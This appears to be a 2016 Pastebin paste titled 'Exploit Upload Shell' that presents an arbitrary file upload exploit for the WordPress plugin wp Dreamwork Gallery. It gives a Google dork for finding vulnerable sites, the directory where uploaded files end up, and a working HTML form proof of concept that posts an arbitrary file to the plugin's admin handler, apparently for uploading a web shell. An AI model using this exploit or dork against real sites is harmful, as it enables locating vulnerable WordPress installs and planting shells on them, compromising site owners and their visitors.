NEO_KOYE

Exploit Upload Shell

Aug 28th, 2016
746
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. _ _ _____ ___ _ _______ _______
  2. | \ | | ____/ _ \ | |/ / _ \ \ / / ____|
  3. | \| | _|| | | | | ' / | | \ V /| _|
  4. | |\ | |__| |_| | | . \ |_| || | | |___
  5. |_| \_|_____\___/ |_|\_\___/ |_| |_____|
  6.  
  7. #########################################################
  8. # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
  9. # Category: webapps
  10. # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
  11. ########################################################
  12.  
  13. # Proof of Concept
  14.  
  15. the uploaded file will be located in the directory
  16.  
  17. Example : [(7)_uploadfolder]
  18. /wp-content/uploads/dreamwork/7_uploadfolder/big/
  19.  
  20.  
  21. <html>
  22. <body>
  23. <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
  24. <input type="hidden" name="task" value="drm_add_new_album" />
  25. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
  26. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
  27. <input type="file" name="album_img" value="" />
  28. <input type="submit" value="Submit" />
  29. </form>
  30. </body>
  31. </html>
Advertisement
Add Comment
Please, Sign In to add comment